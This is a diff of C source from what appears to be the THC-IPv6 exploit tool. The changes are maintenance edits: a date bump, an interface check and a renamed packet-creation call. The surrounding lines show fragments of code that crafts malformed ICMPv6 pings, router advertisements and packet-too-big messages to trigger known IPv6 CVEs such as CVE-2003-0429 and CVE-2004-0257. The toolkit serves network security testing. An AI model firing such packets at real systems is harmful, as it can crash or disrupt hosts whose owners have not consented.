@@ -19,7 +19,7 @@ unsigned short int ports[] = { 22, 25, 53, 80, 443, 0 };
 int rawmode = 0;
 
 void help(char *prg) {
-  printf("%s %s (c) 2012 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
+  printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE);
   printf("Syntax: %s interface destination [test-case-number]\n\n", prg);
   printf("Performs exploits of various CVE known IPv6 vulnerabilities on the destination\n");
   printf("Note that for exploitable overflows only 'AAA...' strings are used.\n");
@@ -60,7 +60,7 @@ int main(int argc, char *argv[]) {
   unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
   unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
   thc_ipv6_hdr *hdr;
-  int i, j, srcmtu, fragsize, offset = 14;
+  int i = 0, j, srcmtu, fragsize, offset = 14;
   pcap_t *p;
   unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
   int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
@@ -99,7 +99,10 @@ int main(int argc, char *argv[]) {
   memset(null_buffer, 0, sizeof(null_buffer));
 
   src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
-  lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK);
+  if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
+    fprintf(stderr, "Error: invalid interface %s\n", interface);
+    exit(-1);
+  }
   strcat(string, thc_ipv62notation(src6));
   strcat(string2, thc_ipv62notation(dst6));
   srcmac = thc_get_own_mac(interface);
@@ -141,7 +144,7 @@ int main(int argc, char *argv[]) {
     if ((mal = malloc(tmplen)) == NULL)
       return -1;
     memset(mal, count % 256, tmplen);
-    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
       return -1;
     thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
     if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
@@ -178,7 +181,7 @@ int main(int argc, char *argv[]) {
     if ((mal = malloc(tmplen)) == NULL)
       return -1;
     memset(mal, count % 256, tmplen);
-    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
       return -1;
     thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
     if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
@@ -200,7 +203,7 @@ int main(int argc, char *argv[]) {
   if (test == 0 || test == count) {
     printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count);
     memset(bla, count % 256, sizeof(bla));
-    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
       return -1;
     memset(buf, 0, sizeof(buf));
     buf[6] = 4;                 // 4-7: retrans timer
@@ -245,7 +248,7 @@ int main(int argc, char *argv[]) {
     printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count);
     memset(bla, count % 256, sizeof(bla));
     memset(buf, 0, sizeof(buf));
-    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
       return -1;
     if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0)
       return -1;
@@ -257,7 +260,7 @@ int main(int argc, char *argv[]) {
     thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + offset, ipv6->pkt_len - offset);
     i = 0;
     while (ports[i] != 0) {
-      if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
+      if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
         return -1;
       if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
         return -1;
@@ -275,7 +278,7 @@ int main(int argc, char *argv[]) {
     printf("Test %2d: CVE-20\n", count);
     memset(bla, count % 256, sizeof(bla));
     memset(buf, 0, sizeof(buf));
-    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
       return -1;
     buf[0] = 0;
     thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
@@ -289,7 +292,7 @@ int main(int argc, char *argv[]) {
     printf("Test %2d: CVE-20\n", count);
     memset(bla, count % 256, sizeof(bla));
     memset(buf, 0, sizeof(buf));
-    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
       return -1;
     buf[0] = 0;
     thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
@@ -304,7 +307,7 @@ int main(int argc, char *argv[]) {
     printf("Test %2d: CVE-20\n", count);
     memset(bla, count%256, sizeof(bla));
     memset(buf, 0, sizeof(buf));
-    if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
+    if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
       return -1;
     buf[0] = 0;
     thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
